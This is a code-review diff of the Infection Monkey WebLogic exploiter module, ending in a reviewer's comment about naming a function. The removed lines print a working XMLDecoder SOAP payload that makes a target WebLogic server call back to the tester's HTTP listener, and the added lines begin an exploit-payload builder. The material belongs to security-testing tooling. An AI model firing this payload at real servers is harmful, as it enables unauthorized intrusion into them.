infection_monkey/exploit/weblogic.py

```diff
@@ -132,43 +103,81 @@ def stop(self):
 
     def check_if_exploitable(self, url):
         # Server might get response faster than it starts listening to it, we need a lock
-        lock = threading.Lock()
-        local_port = get_free_tcp_port()
-        local_ip = get_interface_to_target(self.host.ip_addr)
-        httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
-        httpd.daemon = True
-        lock.acquire()
-        httpd.start()
-        lock.acquire()
-        generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-          <soapenv:Header>
-            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-              <java version="1.8" class="java.beans.XMLDecoder">
-                <void id="url" class="java.net.URL">
-                  <string>http://{lhost}:{lport}</string>
-                </void>
-                <void idref="url">
-                  <void id="stream" method = "openStream" />
-                </void>
-              </java>
-            </work:WorkContext>
-          </soapenv:Header>
-         <soapenv:Body/>
-        </soapenv:Envelope>
-        '''
-        payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
+        httpd, lock = self._start_http_server()
+        payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
         try:
             post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
         except exceptions.ReadTimeout:
+            # Our request does not get response thus we get ReadTimeout error
             pass
         except Exception as e:
             LOG.error("Something went wrong: %s" % e)
+        self._stop_http_server(httpd, lock)
+        return httpd.get_requests > 0
 
+    def _start_http_server(self):
+        lock = threading.Lock()
+        local_port = get_free_tcp_port()
+        local_ip = get_interface_to_target(self.host.ip_addr)
+        httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
+        lock.acquire()
+        httpd.start()
+        lock.acquire()
+        return httpd, lock
+
+    def _stop_http_server(self, httpd, lock):
         lock.release()
         httpd.join(SERVER_TIMEOUT)
         httpd.stop()
-        if httpd.get_requests > 0:
-            exploited = True
-        else:
-            exploited = False
-        return exploited
+        return True
+
+
+    @staticmethod
+    def exploit_payload(cmd_base, cmd_opt, command):
```

Comment:
rename to 'get_exploit_payload' (or 'generate_exploit_payload' or anything along this line)
exploit is also a verb so the function name is a bit confusing